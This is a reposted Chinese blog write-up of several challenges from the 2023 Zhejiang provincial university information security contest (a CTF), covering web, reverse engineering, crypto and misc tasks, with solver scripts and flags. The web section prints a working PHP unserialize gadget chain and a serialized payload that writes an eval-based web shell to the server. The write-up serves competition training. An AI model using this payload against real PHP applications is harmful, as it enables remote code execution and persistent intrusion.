2023浙江省大学生信息安全竞赛初赛部分wp

10月前作者：丨Arcueid丨分类：Toy博客阅读(58) 违法举报

这篇具有很好参考价值的文章主要介绍了2023浙江省大学生信息安全竞赛初赛部分wp。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

Web

easy php

BBB::__debuginfo() -> CCC::__toString() -> AAA::__call()

<?php
class AAA{
    public $cmd;

    public function __call($name, $arguments){
        eval($this->cmd);
        return "done";
    }
}

class BBB{
    public $param1;
    public function __construct($param1){
        $this->param1 = $param1;
    }
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1 
        ];
    }
}

class CCC{
    public $func;

    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }
}

if(isset($_GET['aaa'])){
    $aaa = $_GET['aaa'];
    var_dump(unserialize($aaa));
}


$C = new CCC();
$B = new BBB($C);
$A = new AAA();
$A ->cmd= "file_put_contents('shell.php','<?php eval(\$_POST[1]);?>');";
$C->func = $A; 

echo serialize($B);
# O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:58:"file_put_contents('shell.php','<?php eval($_POST[1]);?>');";}}}

RE

pyccc

uncompyle6.exe 逆不出py

逆出如下文件 2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

分析可知先初始化一个数组再对其内的每个元素异或其下标

c=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
# print(len(c))
tem = ""
for i in range(len(c)):
    tem += chr((c[i]) ^ i)
print(tem,end="")

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

flag{1t_is_very_hap4y!!}

ezapk

反编译apk

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

解aes

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

Crypto

小小数学家

re 匹配数字和符号进行运算

import re
num = re.compile("\d+")
symble = re.compile("\W")

with open("./flag.txt", "r")as f:
    lines = f.readlines()

    for line in lines:
        nums = (num.findall(line))
        symbles = (symble.findall(line))
        print(chr(int(eval(nums[0]+ symbles[0] + nums[1]))),end="")

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

基础数论

sage解p² + q² =n

import hashlib

c = 173178061442550241596295506150572803829268102881297542445649200353047297914764783385643705889370567071577408829104128703765633248277722687055281420899564198724968491216409225857070531370724352556864154450614891750313803499101686782558259953244119778256806332589612663957000269869144555485216828399422391672121
x,y = (two_squares(c))
print(x,y)
print(hashlib.md5(str(x+y).encode()).hexdigest())

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

8ef20a4873c5ec776dd34bf5f0eb56cf

MISC

number game

后端就只有个js文件，可以发现roll这段代码很关键（因为题目说通过roll得到flag）

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

将这段js复制处理，放入console，把if的判断条件改为true，然后再次点击roll，可以发现弹
flag了

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

Ez_misc

拿到题目，根据jpg的文件头，可以发现每两位16进制是反的，那么我们只需要翻转就行了

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

使用脚本进行反转

'''
A.bin
21.7.22
'''
input=open('C:/Users/Abin/Desktop/yuanshen','rb')
input_all = input.read()
ss =input_all[::-1]
output=open('C:/Users/Abin/Desktop/y.zip','wb')
output.write(ss)
input.close()
output.close()

反转之后的结果并不是正确的（因为是逆序的十六进制），我们还需要将整体的字符串反
转，这里我使用工具进行反转

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

数据放入010中生成图片

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

使用steghide进行解密，获得flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT
DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH
DASHDASHDOTDOTDOT DASHDOTDOT

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

根据摩斯密码的特征，及那个DASH转为-，DOT转为.，获得下面的代码

-… -… -… -.-. -… .---- -… --… --… -… -… …- -… -… …-- …- -… -… …-- -… …-- …-- …–
… -… .---- -… …— …-- …-- …-- …- …-- …— -… .---- …-- … -… …— …-- …-- -… …— -…
…— …-- —… …-- … …-- … -… .---- …-- …- …-- -… …-- …- -… …- …-- --… -… …— -…
…— …-- …- -… … -… …-- --… -…

2023浙江省大学生信息安全竞赛初赛部分wp,安全,网络安全

解得flag
flag{df4f635ab342a5b3bb855a464d7bb4ec}文章来源地址https://www.toymoban.com/news/detail-743235.html

到了这里，关于2023浙江省大学生信息安全竞赛初赛部分wp的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

2023第二届浙江省技能大赛温州市选拔赛任务书

竞赛时间共计3小时。任务一：Windows操作系统渗透测试任务环境说明： 服务器场景：Server2003（开放链接） 服务器场景操作系统：Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试，并将该操作显示结果中Telnet服务对应的端口号

2024年02月03日
浏览(56)
2023年2月浙江省中小企业协会与各专委会大事记

1 1月13日上午，协会领导蔡章生带队走访国家绿色技术交易中心，调研绿色技术创新工作，与国家绿色技术交易中心副主任贺沛宇、中教能源研究院黄刚院长（线上视频参会）、项目主管郦剑飞等进行座谈，研究推进“双碳”产业、EATNS碳管理体系建设以及节能降耗项目落户浙

2024年02月14日
浏览(41)
Mapbox加载浙江省天地图服务和数据处理

通过浙江省天地图官网申请所需服务，使用token获取服务数据由于浙江省天地图使用的坐标系是 cgcs2000，需要使用的框架对应为 @cgcs2000/mapbox-gl，通过cdn引入或npm下载影像服务地址为： ‘https://ditu.zjzwfw.gov.cn:443/services/wmts/imgmap/default/oss?service=WMTSrequest=GetTileversion=1.0.0layer=im

2024年01月23日
浏览(44)
2022浙江省计算机三级网络及安全技术考试自学资料（2）（更新于3.8）

目录 4-网络信息安全概况 4-1信息安全基础 4-1-1信息安全基本属性 4-1-2信息安全基本模型 4-1-3信息安全基本法规 4-2密码应用基础 4-2-1古典密码 4-2-2现代密码 4-2-4加密模式 4-2-5分组密码 4-2-6流加密 4-2-7公钥密码 4-2-8哈希函数 4-2-9数字信封 4-1-1信息安全基本属性保密性Confidenti

2024年02月01日
浏览(54)
浙江省计算机三级网络及安全技术资料(最后有我考完后的想法）

还有一周就要考试了，网上几乎找不到浙江省的计算机三级网络及安全技术的复习资料，大部分都是全国计算机三级的复习资料，气得我直接对着大纲一部分一部分找过去。以后的友友们需要的自取，为了能够顺利通过浙江省计算机三级考试，我给大家铺好路。三

2024年02月08日
浏览(49)
2023陕西省大学生信息安全竞赛web writeup

早写好了，忘发了，题目质量还行，够我坐大牢简单的反序列化，exp如下传参这有个坑，用了Unicode编码，得copy下来进行url编码才能传参，不知道这么干有什么意义，还得绕过Exception,把变量数改一下就能绕过了，跟绕wakeup一样 preg_replace采用了/e的模式，很明显有rce漏洞，简

2024年02月07日
浏览(49)
大学生简历信息填写模板

大学生简历信息填写模板篇1 姓名：__性别：_年龄：22健康状况：良好籍贯：__家庭背景：职工家庭所学专业：市场营销学历：本科(在读) 参业意向：可从事文秘工作、贸易、产品营销、活动策划、谈判沟通、广告宣传，市场调查等方面工作。知识结构：

2024年02月09日
浏览(53)
2023大学生申请github学生认证经验分享

如图，笔者最近刚刚申请完github的学生认证，于是想着来分享经验让大家能轻松通过认证。你需要有以下材料：教育邮箱（大学一般都会有教育邮箱，学校官网找找邮箱页面，申请个邮箱）学信网教育部学籍在线验证报告都有的话你就只需要跟着下面的步骤。首先你得

2024年02月09日
浏览(60)
基于java大学生兼职信息管理系统

目前的兼职中介不仅损害了大学生的经济利益，让他们对网上兼职避而远之，与此同时，很多客户比如家里有小孩子的家长都想找一个安全、可靠的家教帮助孩子提高成绩，通过中介找到的既不安全可靠，价格也相对昂贵。因此，为大学生与客户之间搭建一个能直接联系的沟

2023年04月08日
浏览(48)
2023“钉耙编程”中国大学生算法设计超级联赛（1）

给出一颗树，两人在树上特定两点来回走，问最早在那个节点相遇。两条路径相交，则一条路径的LCA一定在另一条路径上。我们可以预处理一个dfs时间戳，结合LCA来判断路径相交。由于本题的点数较小,所以我们可以枚举相交链上的每一个点，然后计算他们在这个点最早相遇

2024年02月16日
浏览(49)